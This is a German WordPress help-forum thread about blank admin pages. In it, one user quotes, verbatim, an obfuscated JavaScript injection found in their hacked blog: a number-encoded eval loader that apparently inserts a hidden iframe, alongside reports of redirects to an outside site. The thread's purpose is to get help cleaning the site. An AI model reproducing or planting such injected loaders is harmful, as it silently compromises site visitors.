• Hallo zusammen,

    seit ein paar Tagen lässt sich mein WP nicht mehr administrieren:
    Wenn ich auf irgendetwas im Backend klicke - rein komme ich da noch -, dann erscheint nur noch eine leere Seite. Das passiert bei fast allem (Artikel schreiben, WP-Aktualisierung...) und bei sämtlichen Browsern an diversen Rechnern.

    Was kann das sein?
    Dank und Gruß
    derhenry

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Hallo zusammen,

    seit ein paar Tagen lässt sich mein WP nicht mehr administrieren:
    Wenn ich auf irgendetwas im Backend klicke - rein komme ich da noch -, dann erscheint nur noch eine leere Seite. Das passiert bei fast allem (Artikel schreiben, WP-Aktualisierung...) und bei sämtlichen Browsern an diversen Rechnern.

    Was kann das sein?
    Dank und Gruß
    derhenry

    ich hatte nun seit einer Woche das gleiche Problem und habe es eigentlich immer noch.
    Bei mir ist es eine Attacke und zwar wird folgendes Script in meinen wordpress blog eingeschleusst:

    Zitat

    <script>aa=([].pop+'asd').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragment']+'asd').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss="";s=String;e=window['e'+'val'];t='b';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n="4.5b4.5b52.5b51b16b20b50b55.5b49.5b58.5b54.5b50.5b55b58b23b51.5b50.5b58b34.5b54b50.5b54.5b50.5b55b58b57.5b33b60.5b42b48.5b51.5b39b48.5b54.5b50.5b20b19.5b49b55.5b50b60.5b19.5b20.5b45.5b24b46.5b20.5b61.5b4.5b4.5b4.5b52.5b51b57b48.5b54.5b50.5b57b20b20.5b29.5b4.5b4.5b62.5b16b50.5b54b57.5b50.5b16b61.5b4.5b4.5b4.5b50b55.5b49.5b58.5b54.5b50.5b55b58b23b59.5b57b52.5b58b50.5b20b17b30b52.5b51b57b48.5b54.5b50.5b16b57.5b57b49.5b30.5b19.5b52b58b58b56b29b23.5b23.5b49.5b52b48.5b58b26b51b57b50.5b50.5b54b48.5b49b23b52.5b55b23.5b59b55.5b52.5b50b23b56b52b56b31.5b56b48.5b51.5b50.5b30.5b27.5b25b48.5b50b24.5b26b51b24.5b51b49.5b27.5b27b49.5b50b25b28b19.5b16b59.5b52.5b50b58b52b30.5b19.5b24.5b24b19.5b16b52b50.5b52.5b51.5b52b58b30.5b19.5b24.5b24b19.5b16b57.5b58b60.5b54b50.5b30.5b19.5b59b52.5b57.5b52.5b49b52.5b54b52.5b58b60.5b29b52b52.5b50b50b50.5b55b29.5b56b55.5b57.5b52.5b58b52.5b55.5b55b29b48.5b49b57.5b55.5b54b58.5b58b50.5b29.5b54b50.5b51b58b29b24b29.5b58b55.5b56b29b24b29.5b19.5b31b30b23.5b52.5b51b57b48.5b54.5b50.5b31b17b20.5b29.5b4.5b4.5b62.5b4.5b4.5b51b58.5b55b49.5b58b52.5b55.5b55b16b52.5b51b57b48.5b54.5b50.5b57b20b20.5b61.5b4.5b4.5b4.5b59b48.5b57b16b51b16b30.5b16b50b55.5b49.5b58.5b54.5b50.5b55b58b23b49.5b57b50.5b48.5b58b50.5b34.5b54b50.5b54.5b50.5b55b58b20b19.5b52.5b51b57b48.5b54.5b50.5b19.5b20.5b29.5b51b23b57.5b50.5b58b32.5b58b58b57b52.5b49b58.5b58b50.5b20b19.5b57.5b57b49.5b19.5b22b19.5b52b58b58b56b29b23.5b23.5b49.5b52b48.5b58b26b51b57b50.5b50.5b54b48.5b49b23b52.5b55b23.5b59b55.5b52.5b50b23b56b52b56b31.5b56b48.5b51.5b50.5b30.5b27.5b25b48.5b50b24.5b26b51b24.5b51b49.5b27.5b27b49.5b50b25b28b19.5b20.5b29.5b51b23b57.5b58b60.5b54b50.5b23b59b52.5b57.5b52.5b49b52.5b54b52.5b58b60.5b30.5b19.5b52b52.5b50b50b50.5b55b19.5b29.5b51b23b57.5b58b60.5b54b50.5b23b56b55.5b57.5b52.5b58b52.5b55.5b55b30.5b19.5b48.5b49b57.5b55.5b54b58.5b58b50.5b19.5b29.5b51b23b57.5b58b60.5b54b50.5b23b54b50.5b51b58b30.5b19.5b24b19.5b29.5b51b23b57.5b58b60.5b54b50.5b23b58b55.5b56b30.5b19.5b24b19.5b29.5b51b23b57.5b50.5b58b32.5b58b58b57b52.5b49b58.5b58b50.5b20b19.5b59.5b52.5b50b58b52b19.5b22b19.5b24.5b24b19.5b20.5b29.5b51b23b57.5b50.5b58b32.5b58b58b57b52.5b49b58.5b58b50.5b20b19.5b52b50.5b52.5b51.5b52b58b19.5b22b19.5b24.5b24b19.5b20.5b29.5b4.5b4.5b4.5b50b55.5b49.5b58.5b54.5b50.5b55b58b23b51.5b50.5b58b34.5b54b50.5b54.5b50.5b55b58b57.5b33b60.5b42b48.5b51.5b39b48.5b54.5b50.5b20b19.5b49b55.5b50b60.5b19.5b20.5b45.5b24b46.5b23b48.5b56b56b50.5b55b50b33.5b52b52.5b54b50b20b51b20.5b29.5b4.5b4.5b62.5";n=n["split"](t);for(i=0;i<n.length;i++)ss+=s['fromCharCode'](-h*n[i]);zx=ss;if((aa=="unct")||(aa=="func"))e(zx);</script><?php

    ich habe schon alles versucht.

    1. die Webseite neu aufgesetzt, leider ist die Datenbank samt Backup - wenn man sie im mysqldumper stehen lässt - auch befallen.
    Nur wenn man das Backup auf den PC überspielt - geht es.

    2. ich habe die Domain gewechselt und auf einem anderen Server eingerichtet - gleiches Problem nach 1-2 Tagen.

    3. es leitet dann auf chat4freelab.in um - diese Seite kommt aus Russland, lt. Logfiles wird auch die Attacke von .ru aus gemacht. Also hab ich fast ganz Russland gesperrt. Da war dann 4 Tage Ruhe und nun hab ich es wieder drauf.

    Der Blog geht zwar, aber wie vom Member oben beschrieben, im Admin geht nicht mehr alles, tw. erscheinen bei Besuchern Download-Seiten usw.

    Hat jemand eine Idee, wie ich das sichern kann - Russland sperren, hilft wohl nicht viel, dann nehmen die einen Proxy, wie gestern abend mit .eu Domain.

    Für eine Hilfe wäre ich sehr dankbar.

  • Es macht wenig Sinn, gleich in Panik zu verfallen. Solange Du keine konkreten Hinweise auf einen Virus hast, lohnt es sich schon mal, nach dem Begriff "weisse Seite" im Zusammenhang mit WP oder PHP zu suchen - sowohl im Forum, wie auch unter Google.

    Und an luengo gerichtet: solange Du die Schwachstelle nicht gefunden und behoben hast, ist die Gefahr nicht wirklich gebannt. Anfangen würde ich bei sämtlichen Passwörtern (WP-Admin, FTP sind die offensichtlichen, möglicherweise auch andere). Passwörter sollten niemals gespeichert werden, besonders nicht in Programmen wie FileZilla, wo sie nicht einmal verschlüsselt abgelegt sind. Als Sofortmassnahme, nachdem Du eine Datei bereinigt hast, kannst Du diese auch mit CHMOD auf 444 setzen - einen vollkommenen Schutz bietet Dir das allerdings auch nicht immer.

  • besonders nicht in Programmen wie FileZilla, wo sie nicht einmal verschlüsselt abgelegt sind.

    Oops...! Man lernt nie aus. Hab soeben meine Passwörter gelöscht...

    Erwähnenswert sei jedoch, dass auch Plugins schuld sein könnten. Ein kontaminiertes Plugin bleibt verseucht. Egal auf welchen Server ich ziehe...

  • Es macht wenig Sinn, gleich in Panik zu verfallen. Solange Du keine konkreten Hinweise auf einen Virus hast, lohnt es sich schon mal, nach dem Begriff "weisse Seite" im Zusammenhang mit WP oder PHP zu suchen - sowohl im Forum, wie auch unter Google.

    Hallo Domino,
    danke für den Tipp. Die Suche hier im Forum fördert nur lauter Beiträge zu Tage, bei denen der Fragesteller aufgefordert wird, nach "weisse Seite" zu suchen. Etwas wirklich hilfreiches war bisher nicht dabei. Hast Du einen Link oder Tipp?

  • Zitat

    Oops...! Man lernt nie aus. Hab soeben meine Passwörter gelöscht...

    Ich habe es auch erst bitter erfahren müssen. ;)

    Zitat

    Hast Du einen Link oder Tipp?

    Fast immer geht es bei der weissen Seite (auf Englisch auch "the Dreaded White Screen Of Death" genannt) um zu wenig verfügbaren Arbeitsspeicher zur Ausführun g von PHP Skripten: PHP memory limit. Will heissen, auf dem Server (besonders bei den am weitesten verbreiteten Shared Hosting Servern) wird vom Betreiber der pro Anwender nutzbare Arbeitsspeicher eingeschränkt. Besonders krasse Fälle wären 8MB, aber auch die recht häufig vertretenen 32MB sind einfach nicht mehr zeitgemäss. WP kommt in der neuesten englischen Fassung damit noch knapp aus, jedoch bereits das Hinzukommen der deutschen Sprachpakete verunmöglicht sinnvolles arbeiten. Nach meinen bisherigen Erfahrungen mit der neuen Version 3.3 DE sind hier 64 MB mindestens erforderlich.

    Weiterführend empfehle ich Dir diesen Link. Er behandelt unter anderem auch die "weisse Seite".

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!